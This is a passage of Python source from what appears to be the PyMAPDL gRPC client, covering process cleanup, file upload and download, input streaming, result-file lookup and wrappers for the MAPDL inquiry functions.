if save:
try:
self.save()
except:
pass
self._kill() # sets self._exited = True
self._close_process()
self._remove_lock_file()
if self._remove_tmp and self._local:
self._log.debug("Removing local temporary files")
shutil.rmtree(self.directory, ignore_errors=True)
if self._local and self._port in _LOCAL_PORTS:
_LOCAL_PORTS.remove(self._port)
def _kill(self):
"""Call exit(0) on the server."""
self._ctrl("EXIT")
self._exited = True
def _close_process(self):
"""Close all MAPDL processes"""
if self._local:
for pid in self._pids:
try:
os.kill(pid, 9)
except OSError:
pass
def _cache_pids(self):
"""Store the process IDs used when launching MAPDL"""
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
with open(script) as f:
raw = f.read()
if os.name == "nt":
pids = re.findall(r"/pid (\d+)", raw)
else:
pids = set(re.findall(r"-9 (\d+)", raw))
self._pids = [int(pid) for pid in pids]
def _remove_lock_file(self):
"""Removes the lock file.
        This is necessary because a segfault of MAPDL or ``sys(0)`` will
not remove the lock file.
"""
mapdl_path = self.directory
if mapdl_path:
for lockname in [self.jobname + ".lock", "file.lock"]:
lock_file = os.path.join(mapdl_path, lockname)
if os.path.isfile(lock_file):
try:
os.remove(lock_file)
except OSError:
pass
def _run_cleanup_script(self): # pragma: no cover
"""Run the APDL cleanup script.
On distributed runs MAPDL creates a cleanup script to kill the
processes created by the ANSYS spawner. Normally this file is
removed when APDL exits normally, but on a failure, it's
necessary to manually close these PIDs.
"""
# run cleanup script when local
if self._local:
for filename in self.list_files():
if "cleanup" in filename:
script = os.path.join(self.directory, filename)
if not os.path.isfile(script):
return
if os.name != "nt":
script = ["/bin/bash", script]
process = subprocess.Popen(
script,
shell=False,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
# always communicate to allow process to run
output, err = process.communicate()
self._log.debug(
"Cleanup output:\n\n%s\n%s", output.decode(), err.decode()
)
def list_files(self, refresh_cache=True):
"""List the files in the working directory of MAPDL.
Parameters
----------
refresh_cache : bool, optional
If local, refresh local cache by querying MAPDL for its
current path.
Returns
-------
list
List of files in the working directory of MAPDL.
Examples
--------
>>> files = mapdl.list_files()
>>> for file in files: print(file)
file.lock
file0.bat
file0.err
file0.log
file0.page
file1.err
file1.log
file1.out
file1.page
"""
if self._local: # simply return a python list of files
if refresh_cache:
local_path = self.directory
else:
local_path = self._directory
if local_path:
if os.path.isdir(local_path):
return os.listdir(local_path)
return []
elif self._exited:
raise RuntimeError("Cannot list remote files since MAPDL has exited")
# this will sometimes return 'LINUX x6', 'LIN', or 'L'
if "L" in self.parameters.platform[:1]:
cmd = "ls"
else:
cmd = "dir /b /a"
files = self.sys(cmd).splitlines()
if not files:
warn("No files listed")
return files
@supress_logging
def sys(self, cmd):
"""Pass a command string to the operating system.
APDL Command: /SYS
Passes a command string to the operating system for execution
(see the Operations Guide). Typical strings are system
commands such as list, copy, rename, etc. Control returns to
the ANSYS program after the system procedure is completed.
ANSYS may not be aware of your specific user environment. For
example, on Linux this command may not recognize aliases,
depending on the hardware platform and user environment.
Parameters
----------
cmd : str
Command string, up to 639 characters (including blanks,
commas, etc.). The specified string is passed verbatim to
the operating system, i.e., no parameter substitution is
performed.
Returns
-------
str
Output from the command.
Examples
--------
>>> mapdl.sys('ls')
"""
# always redirect system output to a temporary file
tmp_file = "__tmp_sys_out__"
super().sys(f"{cmd} > {tmp_file}")
if self._local: # no need to download when local
with open(os.path.join(self.directory, tmp_file)) as fobj:
return fobj.read()
return self._download_as_raw(tmp_file).decode()
def download_result(self, path, progress_bar=False, preference=None):
"""Download remote result files to a local directory
Examples
--------
Download remote result files into the current working directory
>>> import os
>>> mapdl.download_result(os.getcwd())
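        Download only the thermal results instead; this assumes a thermal
        (``rth``) result file actually exists in the MAPDL working directory.
        >>> mapdl.download_result(os.getcwd(), preference='rth')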
"""
def _download(targets):
for target in targets:
save_name = os.path.join(path, target)
self.download(target, save_name, progress_bar=progress_bar)
if preference:
if preference not in ["rst", "rth"]:
raise ValueError("``preference`` must be either 'rst' or 'rth'")
# result file basename is the jobname
jobname = self.jobname
rth_basename = "%s.%s" % (jobname, "rth")
rst_basename = "%s.%s" % (jobname, "rst")
remote_files = self.list_files()
result_file = None
if self._prioritize_thermal and rth_basename in remote_files:
result_file = rth_basename
elif rst_basename in remote_files and rth_basename in remote_files:
if preference == "rth":
result_file = rth_basename
else:
result_file = rst_basename
elif rst_basename in remote_files:
result_file = rst_basename
elif rth_basename in remote_files:
result_file = rth_basename
if result_file: # found non-distributed result
save_name = os.path.join(path, result_file)
self.download(result_file, save_name, progress_bar=progress_bar)
return save_name
# otherwise, download all the distributed result files
if jobname[-1].isnumeric():
jobname += "_"
rst_files = []
rth_files = []
for filename in remote_files:
if "rst" in filename and jobname in filename:
rst_files.append(filename)
elif "rth" in filename and jobname in filename:
rth_files.append(filename)
if self._prioritize_thermal and rth_files:
targets = rth_files
else:
if rst_files and rth_files:
if preference is None:
raise ValueError(
"Found both structural and thermal results files."
"\nPlease specify which kind to download using:\n"
'``preference="rth"`` or ``preference="rst"``'
)
if preference == "rst":
targets = rst_files
elif preference == "rth":
targets = rth_files
elif rst_files:
preference = "rst"
targets = rst_files
elif rth_files:
preference = "rth"
targets = rth_files
else:
remote_files_str = "\n".join("\t%s" % item for item in remote_files)
print("\t".join("\n%s" % item for item in ["a", "b", "c"]))
raise FileNotFoundError(
"Unable to locate any result file from the "
"following remote result files:\n\n" + remote_files_str
)
_download(targets)
return os.path.join(path, jobname + "0." + preference)
@protect_grpc
def _ctrl(self, cmd):
"""Issue control command to the mapdl server
Available commands:
- 'EXIT'
Calls exit(0) on the server.
- 'set_verb'
Enables verbose mode on the server.
- 'VERSION'
            Returns the version string of the server in the form
"MAJOR.MINOR.PATCH". E.g. "0.3.0". Known versions
include:
2020R2 - "0.3.0"
2021R1 - "0.3.0"
2021R2 - "0.4.0"
Unavailable/Flaky:
- 'time_stats'
Prints a table for time stats on the server.
This command appears to be disabled/broken.
- 'mem-stats'
To be added
"""
self._log.debug('Issuing CtrlRequest "%s"', cmd)
request = anskernel.CtrlRequest(ctrl=cmd)
# handle socket closing upon exit
if cmd.lower() == "exit":
try:
# this always returns an error as the connection is closed
self._stub.Ctrl(request)
except (_InactiveRpcError, _MultiThreadedRendezvous):
pass
return
resp = self._stub.Ctrl(request)
if hasattr(resp, "response"):
return resp.response
@wraps(_MapdlCore.cdread)
def cdread(self, *args, **kwargs):
"""Wraps CDREAD"""
option = kwargs.get("option", args[0])
if option == "ALL":
raise ValueError(
'Option "ALL" not supported in gRPC mode. Please '
"Input the geometry and mesh files separately "
r'with "\INPUT" or ``mapdl.input``'
)
        # The old behaviour is to supply the name and the extension separately.
        # To make it easier, we also accept names that already include an extension.
fname = kwargs.get("fname", args[1])
basename = os.path.basename(fname)
if len(basename.split('.')) == 1:
# there is no extension in the main name.
if len(args) > 2:
# if extension is an input as an option (old APDL style)
fname = kwargs.get("fname", args[1]) + '.' + kwargs.get("ext", args[2])
else:
# Using default .db
fname = kwargs.get("fname", args[1]) + '.' + 'cdb'
kwargs.setdefault("verbose", False)
kwargs.setdefault("progress_bar", False)
kwargs.setdefault("orig_cmd", 'CDREAD')
kwargs.setdefault("cd_read_option", option.upper())
self.input(fname, **kwargs)
@wraps(_MapdlCore.tbft)
def tbft(self, oper='', id_='', option1='', option2='', option3='', option4='', option5='', option6='', option7='', **kwargs):
"""Wraps ``_MapdlCore.tbft``."""
if oper.lower() == 'eadd':
# Option 2 is a file and option 4 is the directory.
            # Option 3 is the extension.
option3 = option3.replace('.', '')
fname = option2 if not option3 else option2 + '.' + option3
filename = os.path.join(option4, fname)
if self._local:
if not os.path.exists(filename) and filename not in self.list_files():
raise FileNotFoundError(f"File '{filename}' could not be found.")
else:
if os.path.exists(filename):
self.upload(filename)
option4 = '' # You don't need the directory if you upload it.
elif filename in self.list_files():
option4 = '' # You don't need the directory if the file is in WDIR
else:
raise FileNotFoundError(f"File '{filename}' could not be found.")
return super().tbft(oper, id_, option1, option2, option3, option4, option5, option6, option7, **kwargs)
@protect_grpc
def input(
self,
fname,
verbose=False,
progress_bar=False,
time_step_stream=None,
chunk_size=512,
orig_cmd='/INP',
**kwargs,
):
"""Stream a local input file to a remote mapdl instance.
Stream the response back and deserialize the output.
Parameters
----------
fname : str
MAPDL input file to stream to the MAPDL grpc server.
time_step_stream : int
Time to wait between streaming updates to send back chunks
from the listener file. Larger values mean more data per
chunk and less chunks, but if the command is short, will
wait until time_step_stream is finished leading to a long
execution time.
Due to stability issues, the default time_step_stream is
dependent on verbosity. The defaults are:
- ``verbose=True``: ``time_step_stream=500``
- ``verbose=False``: ``time_step_stream=50``
These defaults will be ignored if ``time_step_stream`` is
manually set.
orig_cmd : str
            Original command. There are some cases where ``input`` is
            used to send the file to the gRPC server, but then we want
to run something different than ``/INPUT``, for example
``CDREAD``.
Returns
-------
str
Response from MAPDL.
Examples
--------
Load a simple ``"ds.dat"`` input file generated from Ansys
Workbench.
>>> output = mapdl.input('ds.dat')
Load that same file while streaming the output in real-time.
>>> output = mapdl.input('ds.dat', verbose=True)
"""
# always check if file is present as the grpc and MAPDL errors
# are unclear
filename = self._get_file_path(fname, progress_bar)
if time_step_stream is not None:
if time_step_stream <= 0:
raise ValueError("``time_step_stream`` must be greater than 0``")
if verbose:
if time_step_stream is None:
time_step_stream = 500
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
request = pb_types.InputFileRequest(filename=filename)
strouts = self._stub.InputFileS(request, metadata=metadata)
responses = []
for strout in strouts:
lines = strout.cmdout
# print out input as it is being run
print("\n".join(lines))
responses.extend(lines)
response = "\n".join(responses)
return response.strip()
# otherwise, not verbose
if time_step_stream is None:
time_step_stream = 50
metadata = [
("time_step_stream", str(time_step_stream)),
("chunk_size", str(chunk_size)),
]
# since we can't directly run /INPUT, we have to write a
        # temporary input file that tells MAPDL to read the input
# file.
tmp_name = "_input_tmp_.inp"
tmp_out = "_input_tmp_.out"
if 'CDRE' in orig_cmd.upper():
# Using CDREAD
option = kwargs.get("cd_read_option", 'COMB')
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{option}','{filename}'\n"
else:
# Using default INPUT
tmp_dat = f"/OUT,{tmp_out}\n{orig_cmd},'{filename}'\n"
if self._local:
local_path = self.directory
with open(os.path.join(local_path, tmp_name), "w") as f:
f.write(tmp_dat)
else:
self._upload_raw(tmp_dat.encode(), tmp_name)
request = pb_types.InputFileRequest(filename=tmp_name)
# even though we don't care about the output, we still
# need to check. otherwise, since inputfile is
# non-blocking, we could corrupt the service
chunks = self._stub.InputFileS(request, metadata=metadata)
_ = [chunk.cmdout for chunk in chunks] # unstable
# all output (unless redirected) has been written to a temp output
if self._local:
with open(os.path.join(local_path, tmp_out)) as f:
return f.read()
# otherwise, read remote file
return self._download_as_raw(tmp_out).decode("latin-1")
def _get_file_path(self, fname, progress_bar=False):
"""Find files in the Python and MAPDL working directories.
**The priority is for the Python directory.**
Hence if the same file is in the Python directory and in the MAPDL directory,
PyMAPDL will upload a copy from the Python directory to the MAPDL directory,
overwriting the MAPDL directory copy.
"""
if os.path.isdir(fname):
raise ValueError(f"`fname` should be a full file path or name, not the directory '{fname}'.")
fpath = os.path.dirname(fname)
fname = os.path.basename(fname)
fext = fname.split('.')[-1]
ffullpath = os.path.join(fpath, fname)
if os.path.exists(ffullpath) and self._local:
return ffullpath
if self._local:
if os.path.isfile(fname):
# And it exists
filename = os.path.join(os.getcwd(), fname)
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = os.path.join(self.directory, fname)
else:
# Finally
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
else: # Non-local
# upload the file if it exists locally
if os.path.isfile(ffullpath):
self.upload(ffullpath, progress_bar=progress_bar)
filename = fname
elif fname in self.list_files():
# It exists in the Mapdl working directory
filename = fname
else:
raise FileNotFoundError(f"Unable to locate filename '{fname}'")
return filename
def _flush_stored(self):
"""Writes stored commands to an input file and runs the input
file. Used with non_interactive.
"""
self._log.debug("Flushing stored commands")
commands = "\n".join(self._stored_commands)
if self._apdl_log:
self._apdl_log.write(commands + "\n")
self._log.debug(
"Writing the following commands to a temporary " "apdl input file:\n%s",
commands,
)
# write to a temporary input file
def build_rand_tmp():
return os.path.join(tempfile.gettempdir(), f"tmp_{random_string()}.inp")
# rare case of duplicated tmpfile (birthday problem)
tmp_filename = build_rand_tmp()
while os.path.isfile(tmp_filename):
tmp_filename = build_rand_tmp()
with open(tmp_filename, "w") as fid:
fid.writelines(commands)
self._store_commands = False
self._stored_commands = []
# run the stored commands
out = self.input(
tmp_filename,
write_to_log=False,
verbose=False,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=False,
)
# skip the first line as it simply states that it's reading an input file
self._response = out[out.find("LINE= 0") + 13 :]
self._log.info(self._response)
# try/except here because MAPDL might have not closed the temp file
try:
os.remove(tmp_filename)
except:
self._log.warning("Unable to remove temporary file %s", tmp_filename)
@protect_grpc
def _get(self, entity, entnum, item1, it1num, item2, it2num):
"""Sends gRPC *Get request.
.. warning::
Not thread safe. Uses ``_get_lock`` to ensure multiple
            requests are not evaluated simultaneously.
"""
if self._store_commands:
raise RuntimeError(
"Cannot use gRPC enabled ``GET`` when in non_interactive mode. "
"Exit non_interactive mode before using this method."
)
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num}"
# not threadsafe; don't allow multiple get commands
while self._get_lock:
time.sleep(0.001)
self._get_lock = True
try:
getresponse = self._stub.Get(pb_types.GetRequest(getcmd=cmd))
finally:
self._get_lock = False
if getresponse.type == 0:
raise ValueError(
"This is either an invalid get request, or MAPDL is set"
" to the wrong processor (e.g. on BEGIN LEVEL vs."
" POST26)"
)
if getresponse.type == 1:
return getresponse.dval
elif getresponse.type == 2:
return getresponse.sval
raise RuntimeError(f"Unsupported type {getresponse.type} response from MAPDL")
@protect_grpc
def download(
self,
target_name,
out_file_name=None,
chunk_size=DEFAULT_CHUNKSIZE,
progress_bar=True,
):
"""Download a file from the gRPC instance
Parameters
----------
target_name : str
Target file on the server. File must be in the same
directory as the mapdl instance. List current files with
``mapdl.list_files()``
out_file_name : str, optional
Save the filename as a different name other than the
``target_name``.
chunk_size : int, optional
Chunk size in bytes. Must be less than 4MB. Defaults to 256 kB.
        progress_bar : bool, optional
            Display a progress bar using ``tqdm`` when ``True``.
            Helpful for showing download progress.
Examples
--------
Download the remote result file "file.rst" as "my_result.rst"
>>> mapdl.download('file.rst', 'my_result.rst')
"""
if out_file_name is None:
out_file_name = target_name
request = pb_types.DownloadFileRequest(name=target_name)
metadata = [("time_step_stream", "200"), ("chunk_size", str(chunk_size))]
chunks = self._stub.DownloadFile(request, metadata=metadata)
file_size = save_chunks_to_file(
chunks, out_file_name, progress_bar=progress_bar, target_name=target_name
)
if not file_size:
raise FileNotFoundError(f'File "{target_name}" is empty or does not exist')
@protect_grpc
def upload(self, file_name, progress_bar=True):
"""Upload a file to the grpc instance
        Parameters
        ----------
        file_name : str
            Local file to upload.
        progress_bar : bool, optional
            Display a progress bar using ``tqdm`` when ``True``.
            Helpful for showing upload progress.
Returns
-------
str
Base name of the file uploaded. File can be accessed
relative to the mapdl instance with this file name.
Examples
--------
Upload "local_file.inp" while disabling the progress bar
>>> mapdl.upload('local_file.inp', progress_bar=False)
"""
if not os.path.isfile(file_name):
raise FileNotFoundError(f"Unable to locate filename {file_name}")
chunks_generator = get_file_chunks(file_name, progress_bar=progress_bar)
response = self._stub.UploadFile(chunks_generator)
if not response.length:
raise IOError("File failed to upload")
return os.path.basename(file_name)
@protect_grpc
def _get_array(
self,
entity="",
entnum="",
item1="",
it1num="",
item2="",
it2num="",
kloop="",
**kwargs,
):
"""gRPC VGET request.
Send a vget request, receive a bytes stream, and return it as
a numpy array.
Not thread safe as it uses a constant internal temporary
        parameter name. This method uses ``_vget_lock`` to prevent
        multiple requests from being evaluated simultaneously.
Returns
-------
values : np.ndarray
Numpy 1D array containing the requested *VGET item and entity.
"""
if "parm" in kwargs:
raise ValueError("Parameter name `parm` not supported with gRPC")
while self._vget_lock:
time.sleep(0.001)
self._vget_lock = True
cmd = f"{entity},{entnum},{item1},{it1num},{item2},{it2num},{kloop}"
try:
chunks = self._stub.VGet2(pb_types.GetRequest(getcmd=cmd))
values = parse_chunks(chunks)
finally:
self._vget_lock = False
return values
def _screenshot_path(self):
"""Returns the local path of the MAPDL generated screenshot.
If necessary, downloads the remotely rendered file.
"""
if self._local:
return super()._screenshot_path()
all_filenames = self.list_files()
filenames = []
for filename in all_filenames:
if ".png" == filename[-4:]:
filenames.append(filename)
filenames.sort()
filename = os.path.basename(filenames[-1])
temp_dir = tempfile.gettempdir()
save_name = os.path.join(temp_dir, "tmp.png")
self.download(filename, out_file_name=save_name)
return save_name
@protect_grpc
def _download_as_raw(self, target_name):
"""Download a file from the gRPC instance as a binary
string without saving it to disk.
"""
request = pb_types.DownloadFileRequest(name=target_name)
chunks = self._stub.DownloadFile(request)
return b"".join([chunk.payload for chunk in chunks])
@property
def is_alive(self) -> bool:
"""True when there is an active connect to the gRPC server"""
if self._exited:
return False
if self.busy:
return True
try:
return bool(self.inquire("", "JOBNAME"))
except:
return False
@property
def xpl(self):
"""MAPDL file explorer
Iteratively navigate through MAPDL files.
Examples
--------
Read the MASS record from the "file.full" file
>>> from ansys import Mapdl
>>> mapdl = Mapdl()
>>> xpl = mapdl.xpl
>>> xpl.open('file.full')
>>> vec = xpl.read('MASS')
>>> vec.asarray()
array([ 4, 7, 10, 13, 16, 19, 22, 25, 28, 31, 34, 37, 40, 43, 46, 49, 52,
55, 58, 1], dtype=int32)
"""
return self._xpl
@protect_grpc
def scalar_param(self, pname):
"""Return a scalar parameter as a float.
If parameter does not exist, returns ``None``.
"""
request = pb_types.ParameterRequest(name=pname, array=False)
presponse = self._stub.GetParameter(request)
if presponse.val:
return float(presponse.val[0])
@protect_grpc
def _upload_raw(self, raw, save_as): # consider private
"""Upload a binary string as a file"""
chunks = chunk_raw(raw, save_as)
response = self._stub.UploadFile(chunks)
if response.length != len(raw):
raise IOError("Raw Bytes failed to upload")
# TODO: not fully tested/implemented
@protect_grpc
def Param(self, pname):
presponse = self._stub.GetParameter(pb_types.ParameterRequest(name=pname))
return presponse.val
# TODO: not fully tested/implemented
@protect_grpc
def Var(self, num):
presponse = self._stub.GetVariable(pb_types.VariableRequest(inum=num))
return presponse.val
@property
def math(self):
"""APDL math interface
Returns
-------
:class:`MapdlMath <ansys.mapdl.core.math.MapdlMath>`
Examples
--------
Get the stiffness matrix from MAPDL
        >>> k = mapdl.math.stiff()
        >>> matrix = k.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
        Get the mass matrix from MAPDL
        >>> m = mapdl.math.mass()
        >>> matrix = m.asarray()
<60x60 sparse matrix of type '<class 'numpy.float64'>'
with 1734 stored elements in Compressed Sparse Row format>
"""
from ansys.mapdl.core.math import MapdlMath
return MapdlMath(self)
@protect_grpc
def _data_info(self, pname):
"""Returns the data type of a parameter
APDLMATH vectors only.
"""
request = pb_types.ParameterRequest(name=pname)
return self._stub.GetDataInfo(request)
@protect_grpc
def _vec_data(self, pname):
"""Downloads vector data from a MAPDL MATH parameter"""
dtype = ANSYS_VALUE_TYPE[self._data_info(pname).stype]
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetVecData(request)
return parse_chunks(chunks, dtype)
@protect_grpc
def _mat_data(self, pname, raw=False):
"""Downloads matrix data from a parameter and returns a scipy sparse array"""
try:
from scipy import sparse
except ImportError: # pragma: no cover
raise ImportError("Install ``scipy`` to use this feature") from None
minfo = self._data_info(pname)
stype = ANSYS_VALUE_TYPE[minfo.stype]
mtype = minfo.objtype
shape = (minfo.size1, minfo.size2)
if mtype == 2: # dense
request = pb_types.ParameterRequest(name=pname)
chunks = self._stub.GetMatData(request)
values = parse_chunks(chunks, stype)
return np.transpose(np.reshape(values, shape[::-1]))
elif mtype == 3: # sparse
indptr = self._vec_data(pname + "::ROWS")
indices = self._vec_data(pname + "::COLS")
vals = self._vec_data(pname + "::VALS")
if raw: # for debug
return vals, indices, indptr, shape
else:
return sparse.csr_matrix((vals, indices, indptr), shape=shape)
raise ValueError(f'Invalid matrix type "{mtype}"')
@property
def locked(self):
"""Instance is in use within a pool"""
return self._locked
@locked.setter
def locked(self, new_value):
self._locked = new_value
@supress_logging
def __str__(self):
try:
if self._exited:
return "MAPDL exited"
stats = self.slashstatus("PROD", mute=False)
except: # pragma: no cover
return "MAPDL exited"
st = stats.find("*** Products ***")
en = stats.find("*** PrePro")
product = "\n".join(stats[st:en].splitlines()[1:]).strip()
info = f"Product: {product}\n"
info += f"MAPDL Version: {self.version}\n"
info += f"ansys.mapdl Version: {__version__}\n"
return info
@supress_logging
@run_as_prep7
def _generate_iges(self):
"""Save IGES geometry representation to disk"""
basename = "_tmp.iges"
if self._local:
filename = os.path.join(self.directory, basename)
self.igesout(basename, att=1)
else:
self.igesout(basename, att=1)
filename = os.path.join(tempfile.gettempdir(), basename)
self.download(basename, filename, progress_bar=False)
return filename
@property
def _distributed_result_file(self):
"""Path of the distributed result file"""
if not self._distributed:
return
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
        # ANSYS decided that a jobname ending in a number needs a bonus "_"
if filename[-1].isnumeric():
filename += "_"
rth_basename = "%s0.%s" % (filename, "rth")
rst_basename = "%s0.%s" % (filename, "rst")
rth_file = os.path.join(self.directory, rth_basename)
rst_file = os.path.join(self.directory, rst_basename)
if self._prioritize_thermal:
if not os.path.isfile(rth_file):
raise FileNotFoundError("Thermal Result not available")
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
@property
def _result_file(self):
"""Path of the non-distributed result file"""
try:
filename = self.inquire("", "RSTFILE")
if not filename:
filename = self.jobname
except:
filename = self.jobname
try:
ext = self.inquire("", "RSTEXT")
except: # check if rth file exists
ext = ""
if ext == "":
rth_file = os.path.join(self.directory, "%s.%s" % (filename, "rth"))
rst_file = os.path.join(self.directory, "%s.%s" % (filename, "rst"))
if self._prioritize_thermal and os.path.isfile(rth_file):
return rth_file
if os.path.isfile(rth_file) and os.path.isfile(rst_file):
return last_created([rth_file, rst_file])
elif os.path.isfile(rth_file):
return rth_file
elif os.path.isfile(rst_file):
return rst_file
else:
filename = os.path.join(self.directory, "%s.%s" % (filename, ext))
if os.path.isfile(filename):
return filename
@property
def thermal_result(self):
"""The thermal result object"""
self._prioritize_thermal = True
result = self.result
self._prioritize_thermal = False
return result
def list_error_file(self):
"""Listing of errors written in JOBNAME.err"""
files = self.list_files()
jobname = self.jobname
error_file = None
for test_file in [f"{jobname}.err", f"{jobname}0.err"]:
if test_file in files:
error_file = test_file
break
if not error_file:
return None
        if self._local:
return open(os.path.join(self.directory, error_file)).read()
elif self._exited:
raise MapdlExitedError(
"Cannot list error file when MAPDL Service has " "exited"
)
return self._download_as_raw(error_file).decode("latin-1")
@property
def result(self):
"""Binary interface to the result file using ``pyansys.Result``
Examples
--------
>>> mapdl.solve()
>>> mapdl.finish()
>>> result = mapdl.result
>>> print(result)
PyANSYS MAPDL Result file object
Units : User Defined
Version : 18.2
Cyclic : False
Result Sets : 1
Nodes : 3083
Elements : 977
Available Results:
EMS : Miscellaneous summable items (normally includes face pressures)
ENF : Nodal forces
ENS : Nodal stresses
ENG : Element energies and volume
EEL : Nodal elastic strains
ETH : Nodal thermal strains (includes swelling strains)
EUL : Element euler angles
EMN : Miscellaneous nonsummable items
EPT : Nodal temperatures
NSL : Nodal displacements
RF : Nodal reaction forces
"""
from ansys.mapdl.reader import read_binary
from ansys.mapdl.reader.rst import Result
if not self._local:
# download to temporary directory
save_path = os.path.join(tempfile.gettempdir())
result_path = self.download_result(save_path)
else:
if self._distributed_result_file and self._result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
result_path = self._result_file
else:
# return the file with the last access time
filenames = [self._distributed_result_file, self._result_file]
result_path = last_created(filenames)
if result_path is None: # if same return result_file
result_path = self._result_file
elif self._distributed_result_file:
result_path = self._distributed_result_file
result = Result(result_path, read_mesh=False)
if result._is_cyclic:
if not os.path.isfile(self._result_file):
raise RuntimeError("Distributed Cyclic result not supported")
result_path = self._result_file
else:
result_path = self._result_file
if result_path is None:
raise FileNotFoundError("No result file(s) at %s" % self.directory)
if not os.path.isfile(result_path):
raise FileNotFoundError("No results found at %s" % result_path)
return read_binary(result_path)
@wraps(_MapdlCore.igesin)
def igesin(self, fname="", ext="", **kwargs):
"""Wrap the IGESIN command to handle the remote case."""
if self._local:
out = super().igesin(fname, ext, **kwargs)
elif not fname:
out = super().igesin(**kwargs)
elif fname in self.list_files():
# check if this file is already remote
out = super().igesin(fname, ext, **kwargs)
else:
if not os.path.isfile(fname):
raise FileNotFoundError(
f"Unable to find {fname}. You may need to"
"input the full path to the file."
)
basename = self.upload(fname, progress_bar=False)
out = super().igesin(basename, **kwargs)
return out
@wraps(_MapdlCore.cmatrix)
def cmatrix(
self, symfac="", condname="", numcond="", grndkey="", capname="", **kwargs
):
"""Run CMATRIX in non-interactive mode and return the response
from file.
"""
# The CMATRIX command needs to run in non-interactive mode
if not self._store_commands:
with self.non_interactive:
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
self._response = self._download_as_raw("cmatrix.out").decode()
return self._response
# otherwise, simply run cmatrix as we're already in
# non-interactive and there's no output to return
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
@property
def _name(self):
"""Instance unique identifier."""
if self._ip or self._port:
return f"GRPC_{self._ip}:{self._port}"
return f"GRPC_instance_{id(self)}"
def get_name(self):
return self._name
@property
def _distributed(self) -> bool:
"""MAPDL is running in distributed mode."""
if self.__distributed is None:
self.__distributed = self.parameters.numcpu > 1
return self.__distributed
@wraps(_MapdlCore.ndinqr)
def ndinqr(self, node, key, **kwargs):
"""Wrap the ``ndinqr`` method to take advantage of the gRPC methods."""
super().ndinqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.elmiqr)
def elmiqr(self, ielem, key, **kwargs):
"""Wrap the ``elmiqr`` method to take advantage of the gRPC methods."""
super().elmiqr(ielem, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.kpinqr)
def kpinqr(self, knmi, key, **kwargs):
"""Wrap the ``kpinqr`` method to take advantage of the gRPC methods."""
super().kpinqr(knmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.lsinqr)
def lsinqr(self, line, key, **kwargs):
"""Wrap the ``lsinqr`` method to take advantage of the gRPC methods."""
super().lsinqr(line, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.arinqr)
def arinqr(self, anmi, key, **kwargs):
"""Wrap the ``arinqr`` method to take advantage of the gRPC methods."""
super().arinqr(anmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.vlinqr)
def vlinqr(self, vnmi, key, **kwargs):
"""Wrap the ``vlinqr`` method to take advantage of the gRPC methods."""
super().vlinqr(vnmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.rlinqr)
def rlinqr(self, nreal, key, **kwargs):
"""Wrap the ``rlinqr`` method to take advantage of the gRPC methods."""
super().rlinqr(nreal, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.gapiqr)
def gapiqr(self, ngap, key, **kwargs):
"""Wrap the ``gapiqr`` method to take advantage of the gRPC methods."""
super().gapiqr(ngap, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.masiqr)
def masiqr(self, node, key, **kwargs):
"""Wrap the ``masiqr`` method to take advantage of the gRPC methods."""
super().masiqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.ceinqr)
def ceinqr(self, nce, key, **kwargs):
"""Wrap the ``ceinqr`` method to take advantage of the gRPC methods."""
super().ceinqr(nce, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.cpinqr)
def cpinqr(self, ncp, key, **kwargs):
"""Wrap the ``cpinqr`` method to take advantage of the gRPC methods."""
super().cpinqr(ncp, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.csyiqr)
def csyiqr(self, ncsy, key, **kwargs):
"""Wrap the ``csyiqr`` method to take advantage of the gRPC methods."""
super().csyiqr(ncsy, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.etyiqr)
def etyiqr(self, itype, key, **kwargs):
"""Wrap the ``etyiqr`` method to take advantage of the gRPC methods."""
super().etyiqr(itype, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.foriqr)
def foriqr(self, node, key, **kwargs):
"""Wrap the ``foriqr`` method to take advantage of the gRPC methods."""
super().foriqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.sectinqr)
def sectinqr(self, nsect, key, **kwargs):
"""Wrap the ``sectinqr`` method to take advantage of the gRPC methods."""
